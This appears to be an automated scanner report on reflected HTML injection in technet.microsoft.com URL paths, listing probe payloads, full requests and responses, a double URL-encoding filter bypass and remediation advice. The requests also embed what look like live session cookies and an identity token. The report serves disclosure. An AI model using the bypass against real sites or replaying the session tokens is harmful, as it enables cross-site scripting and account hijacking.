GET /en-us46021%2522%253e%253ca%253eead3e3d9a48/library/bb625087.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:56:58 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us46021"><a>ead3e3d9a48/library/bb625087" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b7ce%2522%253e%253ca%253e513411c4713 was submitted in the REST URL parameter 2. This input was echoed as 7b7ce"><a>513411c4713 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library7b7ce%2522%253e%253ca%253e513411c4713/bb625087.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:05 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library7b7ce"><a>513411c4713/bb625087" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da43a%2522%253e%253ca%253ef735b7a07d3 was submitted in the REST URL parameter 3. This input was echoed as da43a"><a>f735b7a07d3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb625087.aspxda43a%2522%253e%253ca%253ef735b7a07d3 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:13 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb625087.aspxda43a"><a>f735b7a07d3" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7577%2522%253e%253ca%253eacf3b7933c9 was submitted in the REST URL parameter 1. This input was echoed as d7577"><a>acf3b7933c9 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usd7577%2522%253e%253ca%253eacf3b7933c9/library/bb726976.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:58 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd7577"><a>acf3b7933c9/library/bb726976" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 828a9%2522%253e%253ca%253eb8ea94052da was submitted in the REST URL parameter 2. This input was echoed as 828a9"><a>b8ea94052da in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library828a9%2522%253e%253ca%253eb8ea94052da/bb726976.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:06 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library828a9"><a>b8ea94052da/bb726976" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdec4%2522%253e%253ca%253e9c59d07c487 was submitted in the REST URL parameter 3. This input was echoed as fdec4"><a>9c59d07c487 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb726976.aspxfdec4%2522%253e%253ca%253e9c59d07c487 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:13 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb726976.aspxfdec4"><a>9c59d07c487" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7b79%2522%253e%253ca%253e6e48a9d51bc was submitted in the REST URL parameter 1. This input was echoed as d7b79"><a>6e48a9d51bc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usd7b79%2522%253e%253ca%253e6e48a9d51bc/library/bb727024.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:22:11 GMT
